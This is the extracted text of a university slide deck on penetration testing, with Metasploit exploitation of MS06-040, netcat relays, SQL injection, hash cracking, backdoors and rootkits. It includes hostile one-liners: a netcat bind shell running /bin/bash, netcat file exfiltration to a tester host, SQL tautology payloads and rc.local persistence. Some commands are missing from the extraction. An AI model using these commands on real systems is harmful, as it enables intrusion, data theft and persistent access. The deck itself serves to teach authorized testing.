Bikrant Gautam, Swarna Rekha ManchikatlaIA612/Fall-2015/SCSU

PENETRATION TESTING

PENETRATION TESTING

TABLE OF CONTENT✘Forms of Cyber Attacks

✘ Network Penetration✘ Commercial Pen Testing Tools✘ SQL Injection✘ Enumeration and Hash Grabbing✘ Password Cracking✘ Privilege Escalation✘ Final Malicious Phases✘ Data Exfiltration✘ Assignment✘ Conclusion

FORMS OF CYBER ATTACKS

Cyber attack techniques comes in a variety of forms. Few such are listed below:

✘Buffer Overflows✘Command Injection Attacks✘SQL Injection Attacks

BUFFER OVERFLOWS

✘Buffer Overflows technique writes attack code over data and programs located in the target machine, that causes its execution.

✘Huge size input puts attack code into executable areas in the target machine.

✘Example, String of CPU No-operations.

BUFFER OVERFLOWS (Contd..)

Evidence:✘System logs

OS logs - Generate panic and error messages

IDS logs - Indicate buffer overflow alerts

✘Network sensor logs

BUFFER OVERFLOWS (Contd..)Targets:✘ Web browsers

Render HTML, execute embedded scripts.

Drive-by malware attacks browsers when user visits malicious page✘ Web applications

Input injection attacks - commands, meta-characters, pathnames, SQL queries.✘ Client Server & Desktop applications

Email attachments, direct internet interfaces.

Command Injection Attacks✘Executes system commands fooling

a program to execute attackers commands

✘Example, exec (<command line>), system (<command line>)

✘Meta-characters attack are used in injection attacks to confuse or disrupt programs

Example, Pathname injection, directory traversal attacks

✘Command line and meta-characters attacks are inserted into web cookies for cookie poisoning

SQL Injection Attacks

✘Adds SQL commands to an input string using meta-characters.

✘Exposes significant sensitive data and damage database integrity.

✘Example, ‘delete table tablename;’

SQL Injection Attacks (Contd..)

✘Web server logs - records input strings, can be searched for meta-characters, system commands, pathnames, and SQL query statements

✘Injection attacks generate application errors in Event logs, database logs, and application logs.

✘IDS logs - alerts detecting injection attacks

NETWORK PENETRATION

✘METASPLOIT✘Free tool for pen testing✘Has system exploits (code)

that gains access to systems without credentials.

✘User Interfaces:✘GUI✘Command line✘Metasploit console

NETWORK PENETRATION (Contd..)

Requirements for Metasploit Pen Testing:

✘Knowledge about target systems - OS, services, versions, known vulnerabilities like MITRE Common Vulnerabilities and Exposures (CVE) and MS Security Bulletins.

✘Metasploit’s exploit database is searchable with these attributes.

NETWORK PENETRATION (Contd..)Commands for conduct Penetration:

NETWORK PENETRATION (Contd..)

✘The specified Metasploit Console example exploits MS06-040, a vulnerability in the Server service on Windows.

✘A search for MS06-040 turns up exploits. You can set the exploit and display its information.

✘The exploit code (for example, a module named ms06_040_netapi) breaks into the system, using a known software defect.

NETWORK PENETRATION (Contd..)

✘Each exploit can have payloads which is executed on the target system after exploitation (for example, a module named windows/meterpreter/bind_tcp).

✘‘show options’ is used to verify the settings.

✘RHOST - used to set Remote host.✘LHOST - used to set Local host.✘In the example, the target is OS.

NETWORK PENETRATION (Contd..)✘The save command stores the current

settings to a configuration file in the home directory -> ~/.msf3/config.

✘The check command attempts to verify that the target is exploitable.

✘The exploit command launches the attack. This command might succeed, giving you access remotely, or it might return you to the console prompt.

✘The rcheck and rexploit commands recheck and re-launch the exploit.

NETWORK PENETRATION (Contd..)

✘Use the sessions command with list (–l) option to find the active connections. Join the connection and gain access via the interactive (–i) option and the session number.

✘Usually, exploits may give raw shell access whereas, the Meterpreter payload attaches a Dynamic Link Library (DLL) to the running service and returns the Meterpreter command shell.

NETWORK PENETRATION (Contd..)

✘The Meterpreter shell has many built-in commands like file system navigation, local and remote shell commands, uploading executables, and file downloads for exfiltration.

✘‘?’ command gives help information.✘The Metasploit command line (msfcli)

provides an alternative way to use Metasploit.

NETWORK PENETRATION (Contd..)

✘The following command returns help information and a searchable listing of the Metasploit exploits:

✘# ./msfcli | less✘# ./msfcli | grep –i “ms06_040”

NETWORK PENETRATION (Contd..)✘Show options (O)-displays

parameters you can set and their defaults.

✘Show payloads (P)-displays available payloads.

✘Pipe the results to grep (or less) to search for specific payloads.

✘Show targets (T) displays the operating system targets for the exploit.

✘The exploit (E) command launches the attack.

✘There is also a check (C) command (not shown) to test for vulnerability.

Commercial Pen Testing Tools

IMPACT:Basic usage of IMPACT Pro includes below steps:1. Open the application.2. Click Get Updates to download the latest exploits.3. Click New Workspace to create a pen test project.4. Click the Network Information Gathering link to run network mapping and vulnerability probes.5. Enter an IP address range and start to scan.

Commercial Pen Testing Tools (Contd..)

6. Click the Network Attack and Penetration link to initiate automated attacks.7. Click the Privilege Escalation link to obtain administrative access.8. Click the Clean Up link to remove any remote code or other target system changes.9. Click Network Report Generation link to automatically create a report of all findings.

Commercial Pen Testing Tools (Contd..)

CANVAS:✘Canvas has numerous selectable tests

on module tab.✘The tests contain categories like recon,

search, exploits, and commands.✘CANVAS sessions start with network

mapping (the recon category) and include OS detection (osdetect) and port scanning (portscan).

✘As CANVAS maps the network, more and more information is accumulated for reporting.

Using Netcat to Create Connections and Move Data and Binaries

✘Netcat (nc) is a universal tool that runs on Windows, Linux, and Unix. It connect to (I/O) through (TCP) by default.

✘TCP listener setup: Target # nc –l –p 80

✘Remote connection set up to this listener on 10.10.100.10: Tester # nc 10.10.100.10 80

✘Download a file from a target machine:Target # cat file.txt | nc –l –p 80Tester # nc –q0 10.10.100.10 80 |

tee file.txt

Using Netcat to Create Relays and Pivots

✘Netcat commands can be chained togetherto create relays.

Example:Target (.30) # nc –l –p 80 –e /bin/bashRelay Setup C:\> echo nc 10.10.100.30 80 > connect.batRelay (.90) C:\> nc –l –p 80 –e connect.batTester # nc –10 10.10.100.90 80

SQL Injection

SQL injection vulnerabilities arise when input from web forms are added to database queries without proper input validation.

SQL Injection Methods

✘Using tautologies which always evaluate to true✘ SELECT * FROM Faculty WHERE Id=' false'

OR 'true' = 'true'✘Grouping By Parentheses

✘ False’) OR ( ‘true’ = true✘Using SQL comment

✘ false ‘ OR ‘true’ = ‘true’; --

Enumeration and Hash Grabbing

✘Obtaining user credentials for access to systems plays a very significant role in pen testing

✘User Name are available through different sources like web page, social network, Mail service etc.

✘Backtrack has a tool called harvester which can be used to leverage the user credentials from a web based target

Enumeration Continued.

✘ The harvester searchers for services like SNMP and DNS to collect user information from a website.

✘ Enumeration and Hash Grabbing in windows

Enumeration and Hash Grabbing in Windows Continued

✘Using Meterpreter to extract SAM data

✘ If machine is physically accessible✘ Helix and caine to to access windows

registry✘ FTK can be used to collected information

offline as well

Enumeration and Hash Grabbing in Linux

✘Username are easily accessible through /etc/passwd. Username can be harvested as;

✘Password hashes are stored in /etc/shadow. Password hash can be harvested as;

✘Unshadow tool extracts linux password hashes.

Password Cracking

✘Online and offline methods✘Dictionary attack, brute force

attack and fuzzing, Specialized Algorithms

✘Gather information about passwords from password policies

✘Offline tools have more advantages as more passwords can be guessed in fixed interval.

Password Cracking continued..

✘John the ripper✘Cracks virtually all passwords

including linux salted hashes✘Rainbow tables

✘Algorithm to crack complex passwords

✘Matches pre-computed hashes✘Cain and Abel

✘Cracks Windows password,network device and databases.

Privilege Escalation

✘Gain administrative access to target systems.

✘Meterpreter can be used for privilege escalation.

✘Also, password and hashes crackers can be used to gain privileged access to the system.

Final Malicious Phases

✘Providing evidences of compromise, reports, passwords, hashes, service files etc.

✘Exporting of data; data exfiltration using

✘Backdoor

Data Exfiltration Continued..

✘Entrenchment✘Enables backdoors even after

reboots.✘For linux; /etc/rc.local and add

the process to respawn✘Add shortcut to the batch file

in windows system

Data Exfiltration Continued..

✘Hidden Files✘Renaming the files with (.) or

(..) hides them in linux✘Click Hidden Check Box on file

properties dialog for windows✘Rootkits

✘Permanently captures system controls and conceals itself from detection

Data Exfiltration Continued.

✘Rootkit Vectors✘Phishing and Spear Phishing

Email✘Drive by Malware✘AutoPlay Malware

✘Rootkit infection✘User level: affect the user✘Kerner level: modify system

calls

Conclusion

✘There is an obvious need for new threats addressing cyber war issues.

✘Pen testing helps to find the vulnerabilities in a computer or network system or a web application.

✘Organizations should make Penetration testing a mandatory phase in their business cycle.

Assignment:

1)Which forms of cyber attacks would you use to test web applications anddatabases on the web? Why?

How?✘ Cross-Site Scripting (XSS), Inclusion Vulnerabilities:

LFI and RFI, Brute Force.✘ SQL Injection (SQLi), Insecure Direct Object

References

Assignment (Contd..):

2) List the steps in performing a penetration test using Metasploit. What tools would you use prior to Metasploit to improve your chances of successful? penetration?

Assignment (Contd..):

3) Back Door Configuration

Assignment (Contd..):

4)Creating Backtrack account and Hash cracking

Assignment (Contd..):

5) Which of the final malicious phase activities might be useful on a pen test engagement? Why? Which other techniques are unlikely to be allowed by the Rules of Engagement in most enterprises on production (operational) networks.

✘ Backdoor final malicious phase activity is the most useful one on a pen testing engagement

✘ Rootkits final malicious phase activity is unlikely to be allowed by the rules of engagement in most industries on production network as, it Permanently captures system controls and conceals itself from detection.